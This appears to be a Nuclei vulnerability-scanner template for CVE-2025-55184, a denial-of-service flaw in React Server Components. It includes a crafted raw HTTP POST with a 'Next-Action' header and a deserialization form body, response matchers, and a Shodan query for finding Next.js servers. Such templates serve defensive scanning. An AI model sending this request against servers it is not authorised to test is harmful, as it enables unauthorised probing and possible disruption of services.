id: CVE-2025-55184

info:
  name: React Server Components - Denial of Service
  author: DhiyaneshDk
  severity: high
  description: |
    React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process.
  impact: |
    Unauthenticated attackers can cause the server to hang indefinitely, resulting in denial of service and preventing legitimate requests.
  remediation: |
    Update to the latest version beyond 19.2.1.
  reference:
    - https://vercel.com/kb/bulletin/security-bulletin-cve-2025-55184-and-cve-2025-55183#patched-versions
    - https://www.facebook.com/security/advisories/cve-2025-55184
    - https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Next.js"
  tags: cve,cve2025,react,nextjs,react,vuln,vkev

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/x-component
        Content-Type: application/x-www-form-urlencoded
        Next-Action: x

        0=["$F1"]&1={"id":"x","bound":null}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'text/plain')"
          - "status_code == 404"
          - 'contains(body, "Server action not found")'
        condition: and
# digest: 490a0046304402202933432f99b98611bee0af2c903e419fcbda59fd89eb01d3073d7edcacfa220f02201203003d5be68038d4ca7863ab37fb61e31e7e7dd66c4402a90c98f99b015cda:922c64590222798bb761d5b6d8e72950